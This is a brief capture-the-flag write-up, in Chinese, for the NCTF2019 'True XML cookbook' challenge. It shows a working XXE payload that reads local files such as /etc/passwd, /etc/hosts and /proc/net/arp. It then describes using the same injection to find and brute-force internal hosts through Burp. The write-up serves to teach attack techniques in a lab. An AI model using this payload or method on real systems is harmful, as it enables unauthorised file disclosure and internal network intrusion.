[NCTF2019]True XML cookbook

[NCTF2019]True XML cookbook

考点

wp

直接抓包进行XXE

<!DOCTYPE ANY [
    <!ENTITY test SYSTEM "file:///flag">
]>
<user><username>&test;</username><password>123</password></user>

提示加载失败,把文件换成/etc/passwd就成功加载了。再去读/etc/hosts

再去读/proc/net/arp

看到内网有存活的主机,尝试访问,提示失败

放在burp里面爆破一下最后一位地址即可

最后更新于